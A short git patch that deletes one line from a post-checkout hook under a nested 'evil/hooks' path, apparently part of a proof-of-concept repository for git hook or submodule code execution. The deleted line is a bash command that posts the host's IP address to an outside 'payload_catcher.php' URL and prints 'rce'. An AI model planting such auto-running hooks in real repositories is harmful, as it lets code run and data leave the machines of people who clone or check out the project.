From 17e246ea3fb5a977af54046b8ee094afb70c5add Mon Sep 17 00:00:00 2001 From: z0rs Date: Thu, 11 Jan 2024 22:49:15 -0600 Subject: [PATCH] Update modules/1/2/3/4/evil/hooks/post-checkout --- modules/1/2/3/4/evil/hooks/post-checkout | 1 - 1 file changed, 1 deletion(-) diff --git a/modules/1/2/3/4/evil/hooks/post-checkout b/modules/1/2/3/4/evil/hooks/post-checkout index 0d71ffd..a31c45a 100755 --- a/modules/1/2/3/4/evil/hooks/post-checkout +++ b/modules/1/2/3/4/evil/hooks/post-checkout @@ -1,3 +1,2 @@ #!/bin/bash -curl -X POST http://z0.rs/payload_catcher.php -d "ip=$(hostname -I | tr -d '[:space:]')"; echo 'rce';